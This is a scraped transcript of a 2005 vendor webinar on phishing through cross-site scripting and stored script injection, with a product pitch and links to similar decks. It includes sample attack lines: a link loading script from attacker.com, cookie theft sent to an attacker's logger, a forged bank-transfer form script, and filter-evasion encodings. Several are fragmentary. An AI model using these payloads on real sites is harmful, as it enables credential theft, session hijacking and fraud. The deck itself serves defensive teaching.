Presentation is loading. Please wait.

Presentation is loading. Please wait.

Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005 Live Webinar May 26, 2005.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005 Live Webinar May 26, 2005."— Presentation transcript:

1 Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005 Live Webinar May 26, 2005

2 2Imperva Confidential A Word from our Sponsor Imperva Mission Secure the Data Center Product SecureSphere Dynamic Profiling Firewall –Protects proprietary information, custom business applications, and critical servers –Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection –Stops web attacks, database breach, and worm infection Mission Secure the Data Center Product SecureSphere Dynamic Profiling Firewall –Protects proprietary information, custom business applications, and critical servers –Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection –Stops web attacks, database breach, and worm infection Internal Users SecureSphere Gateways SecureSphere Management Server Proprietary Information Custom Business Applications and Critical Servers Data Center

3 3Imperva Confidential Today’s Presenter Amichai Shulman - CTO of Imperva Amichai Shulman –Lecturer on Info Security for Technion - Israel Institute of Technology –CTO of Edvice, security consultant to banks and financial services firms –Leads the Application Defense Center (ADC) Application Defense Center (ADC) –Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center ADC Data Center Security Series –Monthly live webinars on attacks targeting corporate data centers –“Identity Theft” on 6/23 - register at impervaevents.webex.com Amichai Shulman –Lecturer on Info Security for Technion - Israel Institute of Technology –CTO of Edvice, security consultant to banks and financial services firms –Leads the Application Defense Center (ADC) Application Defense Center (ADC) –Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center ADC Data Center Security Series –Monthly live webinars on attacks targeting corporate data centers –“Identity Theft” on 6/23 - register at impervaevents.webex.com

4 4Imperva Confidential Phishing Agenda What is Phishing –Sizing the Threat –Types of Phishing (demo) –Commonly Proposed Solutions Phishing Techniques –Cross Site Scripting Phishing (demos) –Script Injection Phishing (demo) Phishing Defenses –Traditional Defenses –Evasion Techniques –Alternative Solutions What is Phishing –Sizing the Threat –Types of Phishing (demo) –Commonly Proposed Solutions Phishing Techniques –Cross Site Scripting Phishing (demos) –Script Injection Phishing (demo) Phishing Defenses –Traditional Defenses –Evasion Techniques –Alternative Solutions

5 5Imperva Confidential Phishing Threat What is Phishing? Phishing = Social Engineering + Technical Subterfuge Objective –Steal victim’s credentials –Commit crimes using stolen credentials Delivery Mechanism –Spoofed E-mail (or website or IM or Weblogs) Link Sends User to… –Bogus Website Phishing –Real Website Phishing Phishing = Social Engineering + Technical Subterfuge Objective –Steal victim’s credentials –Commit crimes using stolen credentials Delivery Mechanism –Spoofed E-mail (or website or IM or Weblogs) Link Sends User to… –Bogus Website Phishing –Real Website Phishing

6 6Imperva Confidential Phishing Threat How Significant? 64 brands reported hijacked by Phishing in Feb., 05 Dramatic growth over past 2 years Attack Implications –Lost Revenue –Brand Erosion –Regulatory Issues GLB SoX CA 1386 HIPAA 64 brands reported hijacked by Phishing in Feb., 05 Dramatic growth over past 2 years Attack Implications –Lost Revenue –Brand Erosion –Regulatory Issues GLB SoX CA 1386 HIPAA Source: antiphishing.org

7 Bogus Website Phishing Attack Stealing login and password

8 8Imperva Confidential Bogus Website Phishing The Bait Use social engineering (such as email) to get the victim to click on a link with attack

9 9Imperva Confidential Bogus Website Phishing Attack - Easy to Detect Manual Solutions –User education –User looking at URL sees the website is fraudulent Automated Solutions –Industry efforts for strict server authentication –Ex. client side plug-ins (TrustBar, NetIBA, etc.) Manual Solutions –User education –User looking at URL sees the website is fraudulent Automated Solutions –Industry efforts for strict server authentication –Ex. client side plug-ins (TrustBar, NetIBA, etc.) http://www.attacker.com

10 Real Website Phishing Demonstration Stealing login and password T

11 11Imperva Confidential Real Website Phishing Demonstration Similar Bait Attack embedded in e-mail link –http://www.superveda.com/dosearch.asp?string= the attack Could be link in –Website –Instant Message –Weblog Attack embedded in e-mail link –http://www.superveda.com/dosearch.asp?string= the attack Could be link in –Website –Instant Message –Weblog

12 12Imperva Confidential Real Website Phishing Demonstration Attack - Defies Detection Look Authentic! –URL from real website –Genuine certificate from the real website SSL would work correctly Page has injected code –Code for login and password form injected by attacker –Only by looking at property of frame can one see it is injected code sourced from attacking site Look Authentic! –URL from real website –Genuine certificate from the real website SSL would work correctly Page has injected code –Code for login and password form injected by attacker –Only by looking at property of frame can one see it is injected code sourced from attacking site

13 13Imperva Confidential Real Website Phishing Demonstration Attacker Secures Credentials Credentials passed to attackers site User never knows what happened Can be: –Logged into the real site simultaneously as theft OR –Sent login error message and sent to real login page Credentials passed to attackers site User never knows what happened Can be: –Logged into the real site simultaneously as theft OR –Sent login error message and sent to real login page

14 14Imperva Confidential Real Website Phishing Demonstration What Lies Behind the Link Script that is encoded to evade detention

15 Proposed Solutions for Phishing Problem Are they sufficient?

16 16Imperva Confidential Real Website Phishing Threat Proposed Solutions User awareness –Real Website Phishing has the correct URL and real certificates Server authentication –Real Website Phishing attacks will authenticate correctly Hardware Tokens –Real Website Phishing attacks are run on victim’s system Time sensitive or one-time use passwords –Real Website Phishing can exploit the credentials in real-time User awareness –Real Website Phishing has the correct URL and real certificates Server authentication –Real Website Phishing attacks will authenticate correctly Hardware Tokens –Real Website Phishing attacks are run on victim’s system Time sensitive or one-time use passwords –Real Website Phishing can exploit the credentials in real-time

17 Real Website Phishing Techniques

18 18Imperva Confidential Real Website Phishing Threat Phishing Techniques Cross Site Scripting –User interacts with real website –The malicious code is stored at the attacker’s site or in the link itself Script Injection –User interacts with real website –The malicious code is stored inside the real website’s application database Cross Site Scripting –User interacts with real website –The malicious code is stored at the attacker’s site or in the link itself Script Injection –User interacts with real website –The malicious code is stored inside the real website’s application database

19 Technique #1 Cross Site Scripting (XSS)

20 20Imperva Confidential Cross Site Scripting How is it Done? Attack code written in standard client side script language –E.g. JavaScript, VBScript, etc Link in e-mail mixes calls to real website with attack code –Attack code could be invoked from attackers website http://www.superveda.com/login.asp? return=javascript.src=http://www.attacker.com/logincapture.jscript –Attack could be completely incorporated into the link http://www.superveda.com/dosearch.asp? return= ATTACK Returned webpage mixes both real website and attack Attack code written in standard client side script language –E.g. JavaScript, VBScript, etc Link in e-mail mixes calls to real website with attack code –Attack code could be invoked from attackers website http://www.superveda.com/login.asp? return=javascript.src=http://www.attacker.com/logincapture.jscript –Attack could be completely incorporated into the link http://www.superveda.com/dosearch.asp? return= ATTACK Returned webpage mixes both real website and attack

21 Cross Site Scripting (XSS) Phishing Demonstration Stealing cookie credentials T

22 22Imperva Confidential Cross Site Scripting Phishing Demonstration The Bait Site supports “remember me” or auto login feature Implemented using persistent cookies Link send victim to site home page Site supports “remember me” or auto login feature Implemented using persistent cookies Link send victim to site home page

23 23Imperva Confidential Cross Site Scripting Phishing Demonstration The Link Seems OK

24 24Imperva Confidential Cross Site Scripting Phishing Demonstration Attacker Secures Cookie Cookie passed to attackers site Victim never knows what happened –Logs in as usual –No change to his experience Cookie passed to attackers site Victim never knows what happened –Logs in as usual –No change to his experience

25 25Imperva Confidential Cross Site Scripting Phishing Demonstration How Attacker Secured Cookie Access cookie from JavaScript, using document.cookie –Only possible if the script run on the target site (e.g not in another frame) because of domain restrictions in the browser Attack causes the victim to run the following script: document.write(‘ ’) Victim’s browser requests image from attacker’s website –Name of the image is the information to be leaked cookielogger.asp writes cookies on attacker’s web server Access cookie from JavaScript, using document.cookie –Only possible if the script run on the target site (e.g not in another frame) because of domain restrictions in the browser Attack causes the victim to run the following script: document.write(‘ ’) Victim’s browser requests image from attacker’s website –Name of the image is the information to be leaked cookielogger.asp writes cookies on attacker’s web server

26 26Imperva Confidential Cross Site Scripting Phishing Demonstration Attacker Uses Cookie Attacker uses Paros (or other proxy tool) –Proxy between attacker’s browser and website. –Sends cookie to server to impersonate the victim Attacker uses Paros (or other proxy tool) –Proxy between attacker’s browser and website. –Sends cookie to server to impersonate the victim

27 27Imperva Confidential Cross Site Scripting Phishing Demonstration Attacker has User Session Attacker logged on as user –Attacker has full access the website as the victim Attacker logged on as user –Attacker has full access the website as the victim

28 Technique #2 Script Injection

29 29Imperva Confidential Script Injection How is it Done? A close relative of Cross Site Scripting (XSS) Difference is location of attack code –XSS - attacker’s website or in the malicious link –Script Injection - real web application’s database Location makes all the difference –No action required by user Attack runs when victim loads the web page –Link can be totally benign Attack not in the link, the attack is in the site –Potentially liability for website owner since the attack is inside the website A close relative of Cross Site Scripting (XSS) Difference is location of attack code –XSS - attacker’s website or in the malicious link –Script Injection - real web application’s database Location makes all the difference –No action required by user Attack runs when victim loads the web page –Link can be totally benign Attack not in the link, the attack is in the site –Potentially liability for website owner since the attack is inside the website

30 Script Injection Phishing Demonstration Attack embedded in real website database T

31 31Imperva Confidential Script Injection Demo Setting Up Attack (1) Find a text storage field (e.g. comments, user profile) One included in HTML output without being sanitized –E.g. where HTML embedded unchanged Find a text storage field (e.g. comments, user profile) One included in HTML output without being sanitized –E.g. where HTML embedded unchanged

32 32Imperva Confidential Script Injection Demo Setting Up Attack (2) Enter script into text storage field

33 33Imperva Confidential Script Injection Demo Setting Up Attack (3) Script is saved into real website’s database

34 34Imperva Confidential Script Injection Demo Setting Up Attack (4) Test page displays comment without being sanitized. Confirm script executed Test page displays comment without being sanitized. Confirm script executed

35 35Imperva Confidential Script Injection Demo Attack – The Bait URL of attack page https://www.superveda.com/prod=14 –Innocent link to specific product (“Animatrix” video) URL of attack page https://www.superveda.com/prod=14 –Innocent link to specific product (“Animatrix” video)

36 36Imperva Confidential Script Injection Demo Attack User passes through real login screen on way to target URL Attack hits at target URL on real site User passes through real login screen on way to target URL Attack hits at target URL on real site

37 37Imperva Confidential Real Website Phishing Threat Attacks Can Be Anything… Steal user login credentials Steal cookies credentials Force victim to execute an action –Any action the victim is allowed to do on the website –Script injected in banking site to transfer funds: f = document.forms[‘transfer_money’] f.to_account.value = ‘Attackers Account’ f.amount.value = 1000000; f.submit() Steal user login credentials Steal cookies credentials Force victim to execute an action –Any action the victim is allowed to do on the website –Script injected in banking site to transfer funds: f = document.forms[‘transfer_money’] f.to_account.value = ‘Attackers Account’ f.amount.value = 1000000; f.submit()

38 Cross Site Scripting Phishing Demonstration (2) Victim unknowingly makes an purchase T

39 39Imperva Confidential Force User Action Attack Demo The Bait

40 40Imperva Confidential Force User Action Attack Demo The Link Seems OK

41 41Imperva Confidential Force User Action Attack Demo Attack Filled Shopping Cart

42 42Imperva Confidential Force User Action Attack Demo What Lies Behind the Link

43 Traditional Defenses

44 44Imperva Confidential Traditional Defenses Identifying Attacks Attack contain, javascript, or vbscript tags Widely known attack vectors – alert() – Other HTML attributes may contain active code – Attack contain, javascript, or vbscript tags Widely known attack vectors – alert() – Other HTML attributes may contain active code –

45 45Imperva Confidential Traditional Defenses Are Signatures Enough? Solution? –Signature based mechanism – Block all requests with specified text string “ ”, “javascript:” or “vbscript:” NO! –Numerous ways to evade signature engines –Evasions exploit richness and lax parsing of HTML language Solution? –Signature based mechanism – Block all requests with specified text string “ ”, “javascript:” or “vbscript:” NO! –Numerous ways to evade signature engines –Evasions exploit richness and lax parsing of HTML language

46 Signature Evasion Techniques Whitespaces Numerical Character Encoding CSS (Cascade Style Sheets) Event Handlers Whitespaces Numerical Character Encoding CSS (Cascade Style Sheets) Event Handlers T

47 47Imperva Confidential Evasion Techniques Whitespaces When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters Instead of “javascript:” we can write J avasc ri pt: When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters Instead of “javascript:” we can write J avasc ri pt:

48 48Imperva Confidential Evasion Techniques Numerical Character Encoding Encode characters inside HTML strings as numerical values Only the word string in can be numerically encoded Enables attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters 25 different ways to encode ‘j’: ‘j’ = j = j = … = j = j = j = … = j = = j = j... The semicolons are many times not required, so we get an even greater variety of encodings Encode characters inside HTML strings as numerical values Only the word string in can be numerically encoded Enables attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters 25 different ways to encode ‘j’: ‘j’ = j = j = … = j = j = j = … = j = = j = j... The semicolons are many times not required, so we get an even greater variety of encodings

49 49Imperva Confidential Evasion Techniques CSS (Style Sheets) Style attributes can also be dynamically computed using JavaScript code: – Style sheets need not be embedded in HTML code; it can be imported from another file, even on a different host (e.g, the attacker’s) using the tag In http://attacker/attack.css: p { background-image: expression(alert(“Imperva")); } In the attack vector: Style attributes can also be dynamically computed using JavaScript code: – Style sheets need not be embedded in HTML code; it can be imported from another file, even on a different host (e.g, the attacker’s) using the tag In http://attacker/attack.css: p { background-image: expression(alert(“Imperva")); } In the attack vector:

50 50Imperva Confidential Evasion Techniques Event Handlers HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive: – More: – Many more event handlers (up to 80!) can be utilized HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive: – More: – Many more event handlers (up to 80!) can be utilized

51 Evaluating Alternative Defenses Traditional Defenses Application Aware Defenses Traditional Defenses Application Aware Defenses

52 52Imperva Confidential Evaluating Alternative Defenses Traditional Defense Apply very large set of signatures to ALL traffic onLoad, onMouseOver, onFocus, …,,, style=, … Many more we haven’t covered here Problems –Easy to evade with client-side encoding features e.g. whitespace, numerical encoding, etc –Multiple signatures have performance penalty –Multiple signatures results in false positives –Can not block everything that remotely resembles HTML (i.e. that have brackets or an equal sign) In some places users are allowed to type in HTML code Apply very large set of signatures to ALL traffic onLoad, onMouseOver, onFocus, …,,, style=, … Many more we haven’t covered here Problems –Easy to evade with client-side encoding features e.g. whitespace, numerical encoding, etc –Multiple signatures have performance penalty –Multiple signatures results in false positives –Can not block everything that remotely resembles HTML (i.e. that have brackets or an equal sign) In some places users are allowed to type in HTML code

53 53Imperva Confidential Evaluating Alternative Defenses Application Aware Defense Focus the search –Only inspect relevant fields identify dynamic pages, parse HTTP correctly –Don’t bother with fields that normally accept scripts e.g. forms that allows editing of HTML text –Detect attacks only if field contains suspicious characters = & # etc. Cover all cases –Normalize input using client-side decoding Remove redundant white space and decode numerical HTML and style sheet encodings –Apply client side decoding only if required –Create a comprehensive set of signatures  Minimize performance penalty & maximize accuracy Focus the search –Only inspect relevant fields identify dynamic pages, parse HTTP correctly –Don’t bother with fields that normally accept scripts e.g. forms that allows editing of HTML text –Detect attacks only if field contains suspicious characters = & # etc. Cover all cases –Normalize input using client-side decoding Remove redundant white space and decode numerical HTML and style sheet encodings –Apply client side decoding only if required –Create a comprehensive set of signatures  Minimize performance penalty & maximize accuracy

54 A Practical Approach to Real Website Phishing

55 55Imperva Confidential SecureSphere Dynamic Profiling Firewall Application Aware Defense ADC Signatures –Comprehensive set of signatures Dynamic Profiling –Identifies the relevant fields for signature checking –Automatically models the structure and dynamics of.. Web Application: URLs, cookies, users, parameters, sessions, etc. Database: SQL queries, tables, parameters, users, etc. Automatically updated –ADC Signatures updated on regular basis –Dynamic Profiling automatically adapts to app/db changes ADC Signatures –Comprehensive set of signatures Dynamic Profiling –Identifies the relevant fields for signature checking –Automatically models the structure and dynamics of.. Web Application: URLs, cookies, users, parameters, sessions, etc. Database: SQL queries, tables, parameters, users, etc. Automatically updated –ADC Signatures updated on regular basis –Dynamic Profiling automatically adapts to app/db changes Internal Users SecureSphere Gateways SecureSphere Management Server Data Centers

56 Q & A

57 57Imperva Confidential Thank You Imperva, Inc. 950 Tower Lane, Suite 1710 Foster City, CA 94404 Sales: (866) 926-4678 www.imperva.com

58 58Imperva Confidential Real Website Phishing Threat Cross Site Scripting Phishing Goal: Fool both website and victim’s browser –Impersonates a user to a website Attack sent to website as if user entered it –Impersonates a website to a victim Attack sent back to victim as part of code generated by website Method: Malicious code in user entry field –Malicious code written in client side script language E.g. JavaScript, VBScript, etc. –Code sent to website as text in user entry field –User entry field contents included in web page code Goal: Fool both website and victim’s browser –Impersonates a user to a website Attack sent to website as if user entered it –Impersonates a website to a victim Attack sent back to victim as part of code generated by website Method: Malicious code in user entry field –Malicious code written in client side script language E.g. JavaScript, VBScript, etc. –Code sent to website as text in user entry field –User entry field contents included in web page code

59 Constructing an Attack Demonstration Finding and exploiting website vulnerability T

60 60Imperva Confidential Constructing an Attack Step 1: Find Vulnerability Website that embeds user input into HTML output without sanitizing it (e.g. text embedded as is) How can I find a vulnerable module? –http://pointblanksecurity.com/xss/xss2.php Website that embeds user input into HTML output without sanitizing it (e.g. text embedded as is) How can I find a vulnerable module? –http://pointblanksecurity.com/xss/xss2.php

61 61Imperva Confidential Constructing an Attack- Unsanitized Input Example #1

62 62Imperva Confidential Constructing an Attack- Unsanitized Input Example #2 You can embed any HTML tag, including graphics

63 63Imperva Confidential Constructing an Attack Step 2: Delivery Methods Use Social Engineering (such as email) to get the victim to click on a link such as: http://www.superveda.com/dosearch.asp?string= the attack Alternatively, use a forum or a weblog the victim regularly visits and plant an automatic redirection script such as: document.location = “http://www.superveda.com/dosearch.asp? return= alert(‘Imperva’) ” Use Social Engineering (such as email) to get the victim to click on a link such as: http://www.superveda.com/dosearch.asp?string= the attack Alternatively, use a forum or a weblog the victim regularly visits and plant an automatic redirection script such as: document.location = “http://www.superveda.com/dosearch.asp? return= alert(‘Imperva’) ”

Download ppt "Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005 Live Webinar May 26, 2005."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.

Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
DT228/3 Web Development multi page applications/ sharing data.

DT228/3 Web Development multi page applications/ sharing data.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

Similar presentations

Ads by Google